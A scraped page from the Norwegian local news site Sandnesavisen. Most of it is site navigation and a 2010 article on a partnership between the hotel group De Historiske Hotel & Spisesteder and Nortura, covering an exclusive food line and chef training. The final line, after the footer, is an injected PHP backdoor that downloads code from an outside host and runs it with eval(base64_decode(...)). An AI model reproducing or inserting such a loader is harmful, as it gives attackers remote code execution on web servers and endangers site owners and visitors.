Tryggbarna1
GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
En historisk matreise
Skrevet av Atle Stava   
fredag 19. november 2010

De Historiske Hotel & Spisesteder og Nortura inngår nået samarbeid som er banebrytende i Norsk Matkultur. Stikkord er lokal kvalitetsmat og en helt ny eksklusiv produktserie.

Avtalen har en forventet verdi på 40 - 50 millioner pr år, men det er ikke den økonomiske rammen som er det viktigste i dette samarbeidet.

-Dette dreier seg om to parter som har akkurat de samme interessene og hvor profil og historie har svært mange fellestrekk. Både De Historiske og Nortura er tuftet på norsk kultur, så her har vi en unik mulighet til å fronte det beste av hva Norge kan by på, sier salgsdirektør i Nortura Storkjøkken, Jørn-Gunnar Jacobsen

Ny produktserie
Nortura utvikler nå en eksklusiv produktserie som tilbys De Historiske. Serien inneholder helt unike produkter som enten har en spesiell historie, dyrerase, opprinnelse eller foredlingsmetode. En nær støttespiller i dette har vært og er Arne Brimi, som er genuint opptatt av norsk matkultur. Kokker og kjøkkenfaglig ekspertise fra De Historiske vil i fremtiden være med å bidra i produkt- og konseptutvikling sammen med Nortura

-Vi ønsker at gjesten skal være like opptatt av opprinnelsen og kvaliteten på råvarene som man tradisjonelt er av vinen, og det skal være et kvalitetsstempel for et spisested å ha retter fra denne eksklusive serien på menyen, sier Jørn-Gunnar Jacobsen.

Naturlig samarbeid
De Historiske er en gruppering av norske hoteller og spisesteder med en spesiell historie. Blant de i underkant 60 medlemmene er herregårder, herskapshus, gods, store og småhotell i sveitser- og jugendstil samt gamle skysstasjoner som er gjort om til vakre småromantiske hotell. På lik linje som vertskapet, arkitekturen og omgivelsene er maten en viktig del av det “opprinnelige“når du bor eller spiser hos De Historiske Hotel & Spisesteder. 

- Det er derfor naturlig å inngå et samarbeid med Nortura som er eid av 20 000 matprodusenter over hele landet, sier adm dir i De Historiske Nils Henrik Geitle.

-Bøndene er like opptatte av sin del av historien og kulturen i sine områder og på sin gård, og er stolte  over å presentere sine unike råvarer og produkter i rammer som De Historiske Hotel & Spisesteder kan tilby, sier Jørn-Gunnar Jacobsen

Råvarene leveres gjennom de kjente merkevarene Gilde og Prior, men også økologiske produkter fra Norgården, spekemat fra Eldhus og pålegg fra Thulefjord.

Jobber tett med kokkene
Som en del av avtalen skal Nortura og De Historiske sammen bidra til å videreutvikle kompetansen hos kokkene i De Historiske. Dette vil foregå gjennom årlige samlinger med bidragsytere fra det ypperste Norge har på dette området. Nortura har samarbeidsavtaler med det norske kokkelandslaget, andre profilerte kokker, og Gastronomisk Institutt.

- Vi har også hatt et vellykket forsøk med utplassering av lærlinger på våre produksjonsanlegg. Dette vil vi nå også prøve ut med lærlinger hos De Historiske, der de får komme ut på produksjonsanleggene for å lære mer om råvaren de skal servere, sier salgsdirektør Jørn-Gunnar Jacobsen.

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));